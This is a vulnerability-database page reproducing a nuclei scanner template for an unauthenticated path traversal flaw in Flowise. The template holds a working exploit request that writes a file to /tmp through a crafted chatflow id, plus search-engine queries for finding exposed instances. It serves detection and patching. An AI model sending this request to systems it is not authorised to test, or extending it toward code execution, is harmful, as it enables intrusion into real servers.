Lucene search
+L

Flowise - Path Traversal

🗓️ 30 Jul 2026 10:29:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Flowise path traversal flaw up to 2.2.8 allows unauthenticated file read/write; upgrade to 3.0.6.

Related
Refs
Code
id: CVE-2025-71334

info:
  name: Flowise - Path Traversal
  author: theamanrawat
  severity: critical
  description: |
    Flowise <= 2.2.8 contains a path traversal vulnerability caused by missing validation of chatflowId and chatId parameters in file handling, letting unauthenticated attackers read and write arbitrary files, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read and write arbitrary files, potentially leading to remote code execution and full system compromise.
  remediation: |
    Update to version 3.0.6 or later.
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849
    - https://nvd.nist.gov/vuln/detail/CVE-2025-71334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-71334
    cwe-id: CWE-73
  metadata:
    verified: true
    max-request: 2
    vendor: flowiseai
    product: flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
    censys-query: services.http.response.html_title="Flowise"
  tags: cve,cve2025,flowise,lfi,path-traversal,file-write,kev,vkev,intrusive

variables:
  name: "{{randstr}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        part: body
        words:
          - "Flowise"
        case-insensitive: true
        internal: true

  - method: POST
    path:
      - "{{BaseURL}}/api/v1/chatflows"

    headers:
      Content-Type: application/json
      x-request-from: internal

    body: |
      {"id":"../../../../../../../../tmp","name":"{{name}}","deployed":false,"isPublic":false,"flowData":"{\"nodes\":[{\"id\":\"a\",\"data\":{\"category\":\"Document Loaders\",\"inputs\":{\"key\":\"data:text/plain;base64,bnVjbGVpLWN2ZS0yMDI1LTcxMzM0,a:{{name}}.txt\"}}}],\"edges\":[],\"viewport\":{\"x\":1,\"y\":1,\"zoom\":1}}","chatbotConfig":null,"apiConfig":null,"analytic":null,"speechToText":null,"type":"CHATFLOW"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "FILE-STORAGE::"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '\\"FILE-STORAGE::\[\\\\\\"(.*?)\\\\\\"\]\\"'
# digest: 490a0046304402201f6a163a69b1c3d1416c6610c6fcf1cbdb9f1c5564076314e21440686136589c022025b7f2fa67aaeb85c9a3dec6595a06afccbdcfe0fadf235d4ba38267ae4f4cc4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jul 2026 10:20Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
CVSS 3.19.8
EPSS0.01171
SSVC
3